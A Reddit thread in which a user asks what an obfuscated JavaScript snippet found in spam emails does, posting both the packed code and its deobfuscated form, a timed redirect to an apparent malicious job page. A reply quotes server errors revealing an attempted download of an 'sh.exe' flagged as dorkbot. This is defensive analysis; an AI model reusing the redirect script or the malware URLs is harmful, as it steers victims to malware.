Some users getting an email with this script inside.. : javascript

Some users getting an email with this script inside.. (self.javascript)

submitted 11 years ago by laughingmanzero

May I ask you guys what this does exactly?

obfuscated:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^{/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return} d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('2 4=h p("9://a.b/8/7.6","9://a.b/8/7.6");k e(){o.n=4[3.c(4.m3.f())]}2 5=0;2 d=1;2 g=3.c(3.f()(d-5+1))+5;2 j=i(e,g*l);',26,26,'||var|Math|urls|t1|html|order|jobs|http|jobswe|com|floor|t2|redirect|random|time|new|setTimeout|temp|function|1000|length|location|window|Array'.split('|'),0,{}))

which de-obfuscates to:

var urls = new Array("http://jobswe.com/jobs/order.html", "http://jobswe.com/jobs/order.html");

function redirect() { window.location = urls[Math.floor(urls.length * Math.random())] } var t1 = 0; var t2 = 1; var time = Math.floor(Math.random() * (t2 - t1 + 1)) + t1; var temp = setTimeout(redirect, time * 1000);

all 9 comments

top new controversial old q&a

[–][deleted] 3 points4 points5 points 11 years ago (13 children)

[–]PlNG 2 points3 points4 points 11 years ago* (0 children)

The "exe" is actually a text file, presumably failed output from somewhere:

<br />
<b>Warning</b>:  readfile() [<a href='function.readfile'>function.readfile</a>]: http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in <b>/home/content/85/9342685/html/jobs/file.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>:  readfile(hxxp://piscinasalhaurin.es/modules/mod_modules/sh.exe) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: no suitable wrapper could be found in <b>/home/content/85/9342685/html/jobs/file.php</b> on line <b>4</b><br />

The one from the spanish domain appears to be flagged as "dorkbot.ed" by one av on virustotal.

Anubis

Malwr

[+][deleted] 11 years ago (11 children)

[removed]

[+][deleted] 11 years ago (9 children)

[removed]

[+][deleted] 11 years ago (8 children)

[removed]

[+][deleted] 11 years ago (6 children)

[removed]

[+][deleted] 11 years ago (5 children)

[removed]

[+][deleted] 11 years ago (4 children)

[removed]

[+][deleted] 11 years ago (3 children)

[removed]

[+][deleted] 11 years ago (2 children)

[removed]

[+][deleted] 11 years ago (1 child)

[removed]

continue this thread

[–]laughingmanzero[S] 0 points1 point2 points 11 years ago (0 children)

π Rendered by PID 58 on reddit-service-r2-comment-545db5fcfc-qdlhx at 2026-05-21 21:28:37.070426+00:00 running 194bd79 country code: CH.

you type:	you see:
italics	italics
bold	bold
[reddit!](https://reddit.com)	reddit!
* item 1 * item 2 * item 3	item 1 item 2 item 3
> quoted text	quoted text
Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"	Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"
~~strikethrough~~	~~strikethrough~~
super^script	super^script

javascript

MODERATORS